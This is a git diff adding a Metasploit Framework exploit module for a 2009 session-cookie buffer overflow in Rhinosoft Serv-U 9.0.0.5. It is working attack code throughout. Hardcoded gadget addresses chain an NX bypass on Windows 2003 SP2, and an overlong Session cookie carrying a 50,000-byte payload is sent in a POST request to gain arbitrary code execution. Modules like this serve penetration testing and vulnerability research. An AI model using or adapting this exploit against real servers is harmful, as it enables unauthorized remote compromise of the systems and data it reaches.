diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb new file mode 100644 index 0000000000..585ec41acf --- /dev/null +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -0,0 +1,113 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Rhinosoft Serv-U Session Cookie Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5. + Sending a specially crafted POST request with an overly long session cookie + string, an attacker may be able to execute arbitrary code. + }, + 'Author' => + [ + 'Nikolas Rangos nikolaos[at]rangos.de', + 'M.Yanagishita megumi1990[at]gmail.com ', + 'jduck jduck[at]metasploit.com' + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://rangos.de/ServU-ADV.txt' ], + [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows 2003 SP2 English (NX)', + { + 'FixESP' => 0x0fb02849, # add esp, 0x40c / ret @libeay32 + 'FixESI' => 0x78a31e96, # pop esi / ret @mfc90u.dll + 'FixEBP' => 0x78a4ae99, # push esp / pop ebp / ret 0xc @mfc90u.dll + 'Ret' => 0x78a3e987, # ret 0x20 @mfc90u.dll + 'DisableNX' => 0x7c83f547, # NX Disable @ntdll.dll + 'JmpESP' => 0x78b2c753, # jmp esp @mfc90u.dll + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 1 2009')) + + register_options( [ Opt::RPORT(80) ], self.class ) + + end + + def exploit + + # hit end of stack.. + # sploit = make_nops(50000) + sploit = rand_text(50000) + + # new SEH handler + sploit[40948,4] = [target['FixESP']].pack('V') + + # stack frame to bypass NX + sploit[0,4] = [target['FixESI']].pack('V') + sploit[4,4] = [0x10200].pack('V') + sploit[8,4] = [target['FixEBP']].pack('V') + sploit[12,4] = [target['Ret']].pack('V') + sploit[16,4] = [target['JmpESP']].pack('V') + sploit[20,4] = [target['DisableNX']].pack('V') + sploit[24,2] = "\xeb\x20" + sploit[40,payload.encoded.length] = payload.encoded + + # TODO: randomize! + buf = "Cookie: killmenothing; SULang=de%%2CDE; themename=vista;" + buf << " Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814" + buf << sploit.unpack('H*')[0] + buf << "\r\n" + buf << "Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" + buf << "Content-Length: 0\r\n" + buf << "\r\n"; + + req = "POST / HTTP/1.1\r\n" + req << "Host: #{rhost}:#{rport}\r\n" + req << buf + # req << "Content-Length: #{data.length}" + "\r\n\r\n" + data + "\r\n\r\n" + + connect + print_status("Trying target #{target.name}..." % target['Ret']) + sock.put(req) + + sleep(5) + handler + end + +end